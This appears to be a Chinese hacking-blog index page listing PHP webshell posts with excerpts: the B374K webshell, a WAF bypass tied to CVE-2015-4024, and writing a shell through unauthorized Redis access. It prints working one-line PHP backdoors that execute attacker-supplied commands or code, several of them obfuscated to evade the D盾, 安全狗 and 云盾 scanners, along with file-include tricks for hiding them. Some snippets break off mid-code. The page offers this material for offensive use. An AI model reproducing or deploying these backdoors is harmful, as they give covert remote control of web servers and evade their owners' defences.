B374K源自国外的强大PHP WEBSHELL

B374K PHP WEBSHELL

PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

最短php一句话

最短php一句话

<?=`$_GET[1]`;


D盾的软肋 最新过D盾一句话

<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>

今日要分享的一句话:

<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>

原创过狗php一句话

GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c&#39

过云盾、D盾各种盾php shell

<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';

极其隐蔽的pHp小马穿插在正常页面中

<?php
$pssddd="2b";//密码
if($_GET["hks"]==$pssddd){@set_time_limit(100);$slstss="fi"."le_"."ge"."t_c"."onten"."ts";$raworistr='

2015免杀一句话、免杀大马收集

测试过两个完美过安全狗,被狗咬的话就试试文件包含的方法

文件包含方法:

asp代码
<!--#include file="hack1996.txt"-->
php代码
<?php include 'hack1996.txt';  ?>
aspx代码
<code><!--#include file="hack1996.txt"--> </code >

"一句话"的艺术——简单的编码和变形绕过检测

2013122817573781043.jpg

redis写shell的小技巧

最近碰到一个redis未授权访问,想近各种办法最后终于成功了写了webshell,这里写下一点点小经验。

首先,写shell的基本方式,还是按照phithon发的文章,安全脉搏的《利用redis写webshell》

这种方法对于没有存多少数据的redis数据库来说还是很适用的,但是当数据库比较大时,就会遇到一些问题(比如本例中数据库下载下来大小约为200M,还算比较大的)。

首先就是这么大的数据量,里面不可避免会出现这样的字符串“<?”,php遇到这个字符串时就把后面的内容当php脚本解析了,自然会报错,不能运行,对于这个问题,没别的办法,只能找到出错的地方的键值,删掉,然后再写shell。